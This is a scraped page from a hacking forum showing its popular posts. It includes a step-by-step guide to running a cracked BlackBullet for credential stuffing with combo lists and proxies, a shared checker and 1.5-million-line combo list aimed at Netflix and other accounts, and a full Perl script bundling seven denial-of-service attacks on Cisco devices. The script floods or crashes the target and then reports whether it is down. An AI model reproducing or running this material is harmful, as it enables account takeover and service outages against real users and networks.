Jump to content
Report any bug Read more... ×
We're hiring! We are accepting applications for Developers, Teachers, Redactors and Junior Moderators. Read more... ×
Search In
  • More options...
Find results that contain...
Find results in...

Create an account on our board

or login and enjoy all the possibilities

Existing user? Sign In

Sign In



Sign Up

Learn Or Teach

You can learn computer security by practicing in the Dashboard, you can also be taught by a teacher. Or You can teach community members regardless of your specialty, and earn points for each person!

Learn or Teach

The Challenges

The new Challenges page is here. Take advantage of several vulnerable web applications to help train you such as, DVWA, XVWA, Mutillidae. You can also launch an existing or custom virtual machine.

Play Now !

Collaboration Room

The first categories of the forum are rooms that you can create or join in order to participate in events with the other members of the community. You can also create your room to make a teaching request, or attend your teacher's presentation. In this room you can create a private forum, store your information, invite other people etc.

Create Room

Create your club

You can create a club with your friends, earn points in teams. Creating a club gives you access to a team space. There you will have a private forum where you can store files, share information etc. Invite your friends and play together!

Create yours now!

VIP

Several VIP packs are available, understand that the survival of this site depends on it. Of course you can buy this pack with your points won during events. Formulas: Vip Member Vip Teacher Vip student

Buy
News
  • For new users read this
  • Challenges
  • for new users thank you to post in introduction and answer "Accept" on the topic of the rules to have access to the integrity of the forum and receive your Exploit-Code
  • The challenges board is being developed you are likely to encounter some bugs if this is the case report to an administrator.

Leaderboard


Popular Content

Showing content with the highest reputation since 09/23/19 in all areas

  1. 2 points
    Black bullet release an open-sourced version: I share you the file : [Hidden Content] the github: [Hidden Content] And a little pack of config (Gift) : [Hidden Content] Leave a Like
  2. 1 point
    DOWNLOAD LINK : [Hidden Content] Hello today, I'm going to introduce BlackBullet and its new mode of operation! This software was not created by the community this is a crack so potentially bindd with a virus! Use this software via a virtual machine! What's blackbullet ? At the first opening, you have: We can see The BB File and a "Converter" !! Explanations: BB in version 2.0.2 works with Configs in ==> .ini (original) BB in version 2.1.6 works in config ==> .bbc (encrypted) You understand it, this Converter serves you: * Either to change a config .ini in .bbc, or from .bbc to .ini Go on, we continue ==> Open the folder ==> BlackBullet 2.1.6 Cracked In this Dossier, we find: A folder ==> Combos A folder ==> Configs A folder ==> Proxies So you can accommodate your own Combos and Proxies !! We have everything at hand ... VERY IMPORTANT !!! Check that you have the file ==> Launcher.exe !! If not look in your Anti Virus, it is possible that he quarantined it ... (Nothing to fear though, it's a fake!) B / Launch of BB Now we will launch BB, to use ==> Launcher.exe You have several windows that start !!! The !! You click on ==> Login And that's BB in its Version 2.1.6 !! Come on, let's see the top tabs already: I will detail: * Configs Your chosen config is there !! WordLists ==> Combos As on the picture, We will search for it (Add), we name it, The Type, Purpose = Mix and ==> Accept !! Result: * Proxies If your Proxies are loaded at the end of the Manipulation, that must give it !! At this level, you can check them if you wish !! I pass directly ... Last Tab ==> BruteForcer !! First load Config ==> Select CFG Then the Combo ==> Select List At this moment you must have this !! Check a Last Time: Config The Combo Number of Bots - Normally they are determined in Auto if the Config is well done, otherwise Regulate yourself Bots !! * Your Proxies will appear as soon as you click ==> on Start !! If everything went well !! You should have a BB that looks like this in a running state ... Last Explanation on the Infos which are All right !!! COMBOS: Total = The Number of Accounts that is Tested Hits = Your HITS !!!!! Free = The Accounts that are here, are usually Accounts that ask for to change the Pass, When Connecting. Bad = Bad Retries = As under Sentry, The Relaunch of the Software (Sort of Rééssaie !!) PROXIES: Total: The number of your proxies Alive: Those who are on the move Banned: Those who are banned Bad: Those who are Bad CPM: Combo Per Minute !! this often expresses the "Health" of your Config They are more or less high !! If it stays Zero ==> Config Tired or Dead !! Here is this tutorial ends, I hope to have helped you to like Black Bullet !!
  3. 1 point
    Age 34 Why did you come to this forum? meet like minded friends What do you think you learn on the forum? hopefully new things What do you think you give to the forum ? exploits What's your best specialty? exploits,malware,pentesting Tell something about you i love malware,pentesting, exploits and smoking kush What do you want to do ? Teach Learn Rate the forum design Sponsor Guest
  4. 1 point
    Here is a Multi checker with him you can use your Combo on netflix, Zenmate, Pornhub and many others (without configs) LINKS: Mine (i put a 1.5million combo (not private)): [Hidden Content] Some others that i find: [Hidden Content] [Hidden Content] If you want Proxies free go on this website: Proxy List Leave a like
  5. 1 point
    - The first thing to know to have a good foundation and a good atmosphere are the inter-member rules. So more simply polite rules that seem obvious but escape some people. - If you have business to settle, chat or forum posts are not to be used as a means of settlement. Instead, use private messaging while remaining polite; if the problem persists, contact a forum administrator or moderator. - Teacher presentations must be approved by 5 members before being accepted. Each member is authorized to test the knowledge cited in the submitted submission. In addition the moderation team will have an undeniable right of veto on any presentation being admitted. On the contrary a presentation having 3 justified negative votes will be immediately refused. - Our forum dealing with a subject demanding a lot of rigor in the information control (Subject + Msg chat) I forbid all executable files (.exe / .bin / .run / .msi, etc etc) Failure to comply with this rule will result in a temporary or permanent ban depending on the number of recidivism. As the point above makes it clear, you will have to post all your software / scripts in uncompiled format (ie the source code). In addition, if you are the creator of the code, please document it so that it is understandable to others (without explaining each line) Finally, if the code comes from a third-party source, please provide the name of the creator and if available a link to the author's website. Anyone who does not respect this rule will be subject to various sanctions once again depending on the number of recidivism. - A presence on the chat is mandatory under pain of punishment, if you must be away for a long time, notify an administrator or moderator. Some absences can be unpredictable, you will be penalized only if you are connected and you do not speak on the cat. - The sale of cards / bank accounts, Paypal or any other means of payment is strictly prohibited, the ban will be final. - You are on a forum, thank you for sharing your knowledge with members with a lower level than you without remuneration. After registering on the forum, you must present yourself to the community in a clear, correctly spelled, and most accurate way possible in the field of computer science. Any new member not respecting this last rule will be refused by all the members. - The accepted teachers have the duty to control, in turn, the presentations of new members and so on. - DON'T USE ANY PROGRAM HERE ON YOUR PERSONAL COMPUTER, USE AN VIRTUAL MACHINE ! If you see a rule to add, please contact an administrator.
  6. 1 point
    Yo, I'm gonna be showing you how to get animated Profile discord avatar without buying the nitro (+ no need to hover the avatar to see the animation) to get the animated Avatar you'll first need to download a GIF image (with the .git file extension) then go on this website [Hidden Content] and convert your image into APNG (select the image, click on Upload, and then click on Covert to APNG) when the conversion is done, right click on the APNG image and click on save the image as, make sure to have : then go to APNG to GIF and upload imag.gif Click on resize image (100×100) for better compatibility with discord. Finally, download the image resized with that parameter ==> Then just modify your discord image with this one (You can use this technique on many other website/application) Leave a Like /!\ PATCHED BY DISCORD
  7. 1 point
    Welcome, Today i'm sharing with you a little script in perl. Cisco Router DOS collection Features : Cisco IOS Router Denial of Service Vulnerability Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability Cisco 675 Web Administration Denial of Service Vulnerability Cisco IOS Software HTTP Request Denial of Service Vulnerability Cisco 514 UDP Flood Denial of Service Vulnerability CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability Cisco IOS HTTP server DoS Vulnerability Script Perl : use Socket; use IO::Socket; $host = ""; $pilih = ""; $host = @ARGV[ 0 ]; $pilih = @ARGV[ 1 ]; if ($host eq "") { usage(); } if ($pilih eq "") { usage(); } if ($pilih eq "1") { cisco1(); } elsif ($pilih eq "2") { cisco2(); } elsif ($pilih eq "3") { cisco3(); } elsif ($pilih eq "4") { cisco4(); } elsif ($pilih eq "5") { cisco5(); } elsif ($pilih eq "6") { cisco6(); } elsif ($pilih eq "7") { cisco7(); } elsif ($pilih eq "8") { cisco8(); } elsif ($pilih eq "9") { cisco9(); } else { printf "\ninvalid number....\n\n"; exit(1); } sub usage { print "\n Cisco Dos Exploits \n"; print "\n Devilzc0de Framework Dos v.0.1\n"; print "\nProgrammer :: kiddies A.K.A peneter\n"; printf"\n"; printf "\nUsage :: Cisco.pl <your fucking target> <exploit module>\n"; printf "\nExploits Module :\n"; printf "[1] - Cisco IOS Router Denial of Service Vulnerability\n"; printf "[2] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n"; printf "[3] - Cisco 675 Web Administration Denial of Service Vulnerability\n"; printf "[4] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n"; printf "[5] - Cisco 514 UDP Flood Denial of Service Vulnerability\n"; printf "[6] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n"; printf "[7] - Cisco IOS HTTP Denial of Service Vulnerability\n"; exit(1); } sub cisco1 # Cisco IOS Router Denial of Service Vulnerability { my $serv = $host; my $sockd = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd){die "No http server detected on $serv ...\n\n"}; $sockd->autoflush(1); print $sockd "GET /\%\% HTTP/1.0\n\n"; -close $sockd; print "Packet sent ...\n"; sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); } sub cisco2 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability { my $serv = $host; my $port = 22; my $vuln = "a%a%a%a%a%a%a%"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No ssh server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; close($sockd); exit(1); } sub cisco3 # Cisco 675 Web Administration Denial of Service Vulnerability { my $serv = $host; my $port = 80; my $vuln = "GET ? HTTP/1.0\n\n"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No http server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; close($sockd); exit(1); } sub cisco4 # Cisco IOS Software HTTP Request Denial of Service Vulnerability { my $serv = $host; my $port = 80; my $vuln = "GET /error?/ HTTP/1.0\n\n"; my $sockd = IO::Socket::INET->new ( PeerAddr => $serv, PeerPort => $port, Proto => "tcp") || die "No http server detected on $serv ...\n\n"; print "Packet sent ...\n"; print $sockd "$vuln"; sleep(2); print "\nServer response :\n\n"; while (<$sockd>){print} close($sockd); exit(1); } sub cisco5 # Cisco 514 UDP Flood Denial of Service Vulnerability { my $ip = $host; my $port = "514"; my $ports = ""; my $size = ""; my $i = ""; my $string = "%%%%%XX%%%%%"; print "Input packets size : "; $size = <STDIN>; chomp($size); socket(SS, PF_INET, SOCK_DGRAM, 17); my $iaddr = inet_aton("$ip"); for ($i=0; $i<10000; $i++) { send(SS, $string, $size, sockaddr_in($port, $iaddr)); } printf "\nPackets sent ...\n"; sleep(2); printf "Please enter a server's open port : "; $ports = <STDIN>; chomp $ports; printf "\nNow checking server status ...\n"; sleep(2); socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n"; my $dest = sockaddr_in ($ports, inet_aton($ip)); connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n"; printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n"; exit(1); } sub cisco6 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability { my $ip = $host; my $vln = "%%%%%XX%%%%%"; my $num = 30000; my $string .= $vln x $num; my $shc="\015\012"; my $sockd = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $ip, PeerPort => "(2002)", ) || die "Unable to connect to $ip:2002 ...\n\n"; $sockd->autoflush(1); print $sockd "$string" . $shc; while (<$sockd>){ print } print "Packet sent ...\n"; close($sockd); sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$ip, PeerPort=>"(2002)",); unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); exit(1); } sub cisco7 # Cisco IOS HTTP server DoS Vulnerability { my $serv = $host; my $vuln = "GET /TEST?/ HTTP/1.0"; my $sockd = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd){die "No http server detected on $serv ...\n\n"}; print $sockd "$vuln\n\n"; print "Packet sent ...\n"; close($sockd); sleep(1); print("Now checking server's status ...\n"); sleep(2); my $sockd2 = IO::Socket::INET->new ( Proto=>"tcp", PeerAddr=>$serv, PeerPort=>"http(80)",); unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"}; print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); }
×